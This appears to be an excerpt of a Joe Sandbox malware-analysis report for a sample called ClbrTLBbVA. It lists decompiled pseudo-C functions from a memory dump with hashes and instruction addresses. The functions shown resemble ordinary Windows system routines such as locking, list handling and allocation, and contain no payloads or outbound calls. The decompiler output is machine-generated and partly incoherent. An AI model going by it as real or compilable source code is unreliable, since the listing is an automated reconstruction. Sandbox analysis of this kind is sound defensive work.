                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 291d00e327f000677985d9332a899b9e898e70f8b1b7a57ef01373a2b92a18cc
                                        • Instruction ID: aa4192aa409898f3102ab056dd7732816c79263b8fb4cb56d1a7a3c9f68c3a38
                                        • Opcode Fuzzy Hash: 291d00e327f000677985d9332a899b9e898e70f8b1b7a57ef01373a2b92a18cc
                                        • Instruction Fuzzy Hash: 2351BAB0105342ABD722EF28CC44B67BBE5FF54720F14491EF49A87691E770E845CBA6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016BEF40 Relevance: .1, Instructions: 147COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 96%
                                        			E016BEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E016A9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x7788c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E016A2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                        0x016bef4b
                                        0x016bef4d
                                        0x016bef57
                                        0x016bf0bd
                                        0x016bf0c2
                                        0x016bf0d2
                                        0x016bf0d2
                                        0x016bf0c2
                                        0x016bef5d
                                        0x016bef5f
                                        0x016bef67
                                        0x016bef6a
                                        0x016bef6d
                                        0x016bef74
                                        0x016bef7f
                                        0x016bef82
                                        0x016bef82
                                        0x016bef86
                                        0x016bef88
                                        0x016bef8c
                                        0x016bef8f
                                        0x016bef8f
                                        0x016bef8f
                                        0x00000000
                                        0x016bef91
                                        0x016bef93
                                        0x016befc4
                                        0x016befc4
                                        0x016befc4
                                        0x016befca
                                        0x016befd0
                                        0x016bf0a6
                                        0x00000000
                                        0x00000000
                                        0x016bf0af
                                        0x0170bb06
                                        0x0170bb0a
                                        0x016bf0b5
                                        0x016bf0b5
                                        0x016bf0b5
                                        0x016bf0b5
                                        0x00000000
                                        0x016befd6
                                        0x016befd9
                                        0x016bf0de
                                        0x016bf0e2
                                        0x016befdf
                                        0x016befdf
                                        0x016befdf
                                        0x016befe5
                                        0x0170bafc
                                        0x0170bafc
                                        0x016befe5
                                        0x016befeb
                                        0x016befed
                                        0x016bf00f
                                        0x016bf011
                                        0x016bf01a
                                        0x016bf01d
                                        0x016bf021
                                        0x016bf028
                                        0x016bf029
                                        0x016bf029
                                        0x016bf02c
                                        0x00000000
                                        0x016bf02c
                                        0x016beff3
                                        0x016beff9
                                        0x016bf0ea
                                        0x016bf0ed
                                        0x016bf0ef
                                        0x00000000
                                        0x016bf0ef
                                        0x016bf003
                                        0x0170bb12
                                        0x016bf045
                                        0x016bf049
                                        0x016bf051
                                        0x016bf09e
                                        0x016bf0a0
                                        0x016bf0a0
                                        0x016bf09e
                                        0x016bf053
                                        0x016bf064
                                        0x016bf064
                                        0x016bf06b
                                        0x0170bb1a
                                        0x0170bb1a
                                        0x016bf071
                                        0x016bf071
                                        0x016bf07d
                                        0x016bf082
                                        0x016bf08f
                                        0x016bf08f
                                        0x016bf009
                                        0x016bf00d
                                        0x00000000
                                        0x016bf00d
                                        0x016befd0
                                        0x016bef97
                                        0x016befa5
                                        0x016befaa
                                        0x00000000
                                        0x016befac
                                        0x016befac
                                        0x016befac
                                        0x00000000
                                        0x016befb2
                                        0x016bf036
                                        0x016bf03a
                                        0x016bf040
                                        0x016bf090
                                        0x00000000
                                        0x016bf092
                                        0x016bf042
                                        0x00000000
                                        0x016bf042
                                        0x016befb7
                                        0x016befb9
                                        0x016befbc
                                        0x016befb0
                                        0x016befb0
                                        0x00000000
                                        0x016befbe
                                        0x016befbe
                                        0x016befc1
                                        0x00000000
                                        0x016befc1
                                        0x016befbc
                                        0x016befaa
                                        0x016bef91

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                        • Instruction ID: b81579fc33d12fa6cff54c4201c715e5ede8c70cf98d1bd059470c7afd214e62
                                        • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                        • Instruction Fuzzy Hash: D351C030E04649DBEB25CB6CC8E0BEEBBF1AF05314F1881A8D545973A2C376A9C9C751
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0177740D Relevance: .1, Instructions: 141COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 84%
                                        			E0177740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E016FD4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E016EF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L016C4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L016C4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E016EF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L016C4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                        0x0177740d
                                        0x0177740d
                                        0x01777412
                                        0x01777413
                                        0x01777416
                                        0x01777418
                                        0x0177741c
                                        0x0177741f
                                        0x01777422
                                        0x01777422
                                        0x01777428
                                        0x0177742a
                                        0x0177742a
                                        0x01777451
                                        0x01777432
                                        0x0177744f
                                        0x0177744f
                                        0x00000000
                                        0x01777434
                                        0x01777438
                                        0x01777443
                                        0x01777517
                                        0x01777517
                                        0x0177751a
                                        0x01777535
                                        0x01777520
                                        0x01777527
                                        0x0177752c
                                        0x01777531
                                        0x01777533
                                        0x00000000
                                        0x01777533
                                        0x00000000
                                        0x01777531
                                        0x0177754b
                                        0x0177754f
                                        0x0177755c
                                        0x0177755c
                                        0x0177755f
                                        0x01777560
                                        0x01777561
                                        0x01777562
                                        0x01777563
                                        0x01777568
                                        0x0177756a
                                        0x0177756c
                                        0x0177756d
                                        0x0177756d
                                        0x0177756f
                                        0x01777572
                                        0x01777574
                                        0x01777577
                                        0x0177757c
                                        0x0177757f
                                        0x00000000
                                        0x01777551
                                        0x01777551
                                        0x01777551
                                        0x01777553
                                        0x01777553
                                        0x01777449
                                        0x01777449
                                        0x0177744c
                                        0x0177744c
                                        0x00000000
                                        0x0177744c
                                        0x01777443
                                        0x0177750e
                                        0x01777514
                                        0x01777514
                                        0x01777455
                                        0x01777469
                                        0x0177746d
                                        0x00000000
                                        0x01777473
                                        0x01777473
                                        0x01777476
                                        0x01777480
                                        0x01777484
                                        0x0177748e
                                        0x01777493
                                        0x01777493
                                        0x01777496
                                        0x01777499
                                        0x017774a1
                                        0x017774b1
                                        0x017774b5
                                        0x00000000
                                        0x017774bb
                                        0x017774c1
                                        0x017774c1
                                        0x017774c4
                                        0x017774c5
                                        0x017774c6
                                        0x017774c7
                                        0x017774c8
                                        0x017774cd
                                        0x00000000
                                        0x017774d3
                                        0x017774d3
                                        0x017774d6
                                        0x017774d8
                                        0x017774db
                                        0x017774dd
                                        0x017774e0
                                        0x017774e7
                                        0x017774ee
                                        0x017774ee
                                        0x017774f4
                                        0x017774f9
                                        0x00000000
                                        0x017774fb
                                        0x017774fb
                                        0x017774fd
                                        0x01777500
                                        0x01777503
                                        0x01777505
                                        0x01777505
                                        0x017774f9
                                        0x00000000
                                        0x017774cd
                                        0x017774b5
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                        • Instruction ID: 761723e742357b5ea7789f2b3294f9ed2b46e91e964bd68e9d160828f7f5b457
                                        • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                        • Instruction Fuzzy Hash: 0A517B71600646EFDB1ACF18C884A96FBB5FF45704F24C1AAE9089F212E771E946CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016D4D3B Relevance: .1, Instructions: 131COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 78%
                                        			E016D4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x179d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E016EFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x1797bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E016EB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L016C4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E016ACCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E016EB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E016EF380(_t67 + 0xc, 0x1685138, 0x10) == 0) {
								 *0x17960d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E016D4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E016D4E70(0x17986b0, 0x16d5690, 0, 0) != 0) {
					_t46 = E016ACCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                        0x016d4d3b
                                        0x016d4d4d
                                        0x016d4d53
                                        0x016d4d58
                                        0x016d4d65
                                        0x016d4d6c
                                        0x016d4d71
                                        0x016d4d77
                                        0x016d4d7f
                                        0x016d4d8c
                                        0x016d4d8e
                                        0x016d4dad
                                        0x016d4db0
                                        0x016d4db7
                                        0x016d4db8
                                        0x016d4db9
                                        0x016d4dba
                                        0x016d4dbb
                                        0x016d4dc1
                                        0x016d4dc8
                                        0x016d4dcc
                                        0x016d4dd5
                                        0x016d4dde
                                        0x016d4ddf
                                        0x016d4de0
                                        0x016d4de1
                                        0x016d4de6
                                        0x016d4de7
                                        0x016d4de9
                                        0x016d4df3
                                        0x00000000
                                        0x00000000
                                        0x01716c7c
                                        0x01716c8a
                                        0x01716c8a
                                        0x01716c9d
                                        0x01716ca7
                                        0x01716cac
                                        0x01716cb2
                                        0x01716cb9
                                        0x00000000
                                        0x01716cbf
                                        0x01716cbf
                                        0x00000000
                                        0x01716cbf
                                        0x01716cb9
                                        0x016d4dfb
                                        0x01716ccf
                                        0x01716cd3
                                        0x016d4e32
                                        0x016d4e39
                                        0x01716ce0
                                        0x01716cf2
                                        0x01716cf2
                                        0x01716ce0
                                        0x016d4e3f
                                        0x016d4e41
                                        0x016d4e51
                                        0x016d4e51
                                        0x016d4e03
                                        0x016d4e03
                                        0x016d4e09
                                        0x016d4e0f
                                        0x016d4e57
                                        0x00000000
                                        0x00000000
                                        0x016d4e1b
                                        0x016d4e30
                                        0x016d4e5b
                                        0x016d4e5b
                                        0x00000000
                                        0x016d4e30
                                        0x016d4e11
                                        0x016d4e11
                                        0x016d4e16
                                        0x00000000
                                        0x016d4e16
                                        0x016d4e01
                                        0x00000000
                                        0x016d4e01
                                        0x016d4da5
                                        0x01716c6b
                                        0x00000000
                                        0x016d4dab
                                        0x016d4dab
                                        0x00000000
                                        0x016d4dab

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c5bc37d1f1b729abe4cdc5e3892cf316b54ebf75924a52b0f0de3f8091014ed1
                                        • Instruction ID: c4b63e9e99944454da5d83b67a8fbe13a467be4b59c88437197870be8fa0e34d
                                        • Opcode Fuzzy Hash: c5bc37d1f1b729abe4cdc5e3892cf316b54ebf75924a52b0f0de3f8091014ed1
                                        • Instruction Fuzzy Hash: F141D371E44318AFEB32DF18CC84FAAB7AAEB54610F004199E9459B681DBB0ED44CB95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016B8A0A Relevance: .1, Instructions: 120COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 94%
                                        			E016B8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x179d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E016EB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E016BE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x1681180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E016D1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E016E3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E016B8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                        0x016b8a0a
                                        0x016b8a1c
                                        0x016b8a23
                                        0x016b8a2e
                                        0x016b8a30
                                        0x016b8a36
                                        0x016b8a3c
                                        0x016b8a3e
                                        0x016b8a4a
                                        0x016b8a52
                                        0x016b8a9c
                                        0x016b8aae
                                        0x016b8a58
                                        0x016b8a5e
                                        0x016b8a6a
                                        0x016b8a6f
                                        0x016b8a75
                                        0x016b8a7d
                                        0x016b8a85
                                        0x016b8a86
                                        0x016b8a89
                                        0x016b8a93
                                        0x016b8a99
                                        0x016b8a9b
                                        0x00000000
                                        0x016b8aaf
                                        0x016b8abe
                                        0x016b8ac3
                                        0x016b8acb
                                        0x016b8ad7
                                        0x016b8ae0
                                        0x016b8af1
                                        0x00000000
                                        0x016b8af1
                                        0x016b8acd
                                        0x016b8ad5
                                        0x016b8afb
                                        0x016b8afd
                                        0x016b8aff
                                        0x016b8b07
                                        0x016b8b22
                                        0x016b8b24
                                        0x016b8b2a
                                        0x016b8b2e
                                        0x016b8b3f
                                        0x016b8b78
                                        0x016b8b41
                                        0x016b8b52
                                        0x016b8b54
                                        0x016b8b5c
                                        0x016b8b74
                                        0x016b8b74
                                        0x016b8b5c
                                        0x016b8b3f
                                        0x016b8b5e
                                        0x016b8b61
                                        0x016b8b64
                                        0x016b8b64
                                        0x016b8b6c
                                        0x016b8b6c
                                        0x016b8b11
                                        0x01709cd5
                                        0x01709cd5
                                        0x016b8b17
                                        0x016b8b1a
                                        0x016b8b1a
                                        0x00000000
                                        0x016b8ad5
                                        0x016b8a89

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: deb49d8e353ae66c679c5a3f0d73fb279272d14ad53d44e60967e6c47ee57cd1
                                        • Instruction ID: 8bc7052e4e4acb8e5fd46dd8ac3a788fcec21e45163b6794804ad5b1e0dd260f
                                        • Opcode Fuzzy Hash: deb49d8e353ae66c679c5a3f0d73fb279272d14ad53d44e60967e6c47ee57cd1
                                        • Instruction Fuzzy Hash: C8415CB0A402299BDB24DF69CCC8AEAB7BDFB54300F1041E9D91997342E7709E81CF60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017269A6 Relevance: .1, Instructions: 108COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 69%
                                        			E017269A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x179d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L016B6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E01726BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E016E9980() >= 0) {
							E016C2280(_t56, 0x1798778);
							_t77 = 1;
							_t68 = 1;
							if( *0x1798774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x1798774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E016AB6F0(0x168c338, 0x168c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E016E9520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E016E95D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E016BFFB0(_t68, _t77, 0x1798778);
				}
				_pop(_t78);
				return E016EB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                        0x017269b5
                                        0x017269be
                                        0x017269c3
                                        0x017269c9
                                        0x017269cc
                                        0x017269d1
                                        0x017269d3
                                        0x017269de
                                        0x017269e1
                                        0x017269ea
                                        0x017269f6
                                        0x017269fe
                                        0x01726a13
                                        0x01726a14
                                        0x01726a15
                                        0x01726a16
                                        0x01726a1e
                                        0x01726a26
                                        0x01726a31
                                        0x01726a36
                                        0x01726a37
                                        0x01726a40
                                        0x01726a49
                                        0x01726a4a
                                        0x01726a53
                                        0x01726a59
                                        0x01726a5d
                                        0x01726a5e
                                        0x01726a64
                                        0x01726a67
                                        0x01726a6a
                                        0x01726a6d
                                        0x01726a70
                                        0x01726a77
                                        0x01726a7d
                                        0x01726a86
                                        0x01726a89
                                        0x01726a9c
                                        0x01726a9f
                                        0x01726aa2
                                        0x01726aa5
                                        0x01726aaf
                                        0x01726ab1
                                        0x01726ab8
                                        0x01726ab9
                                        0x01726abb
                                        0x01726abe
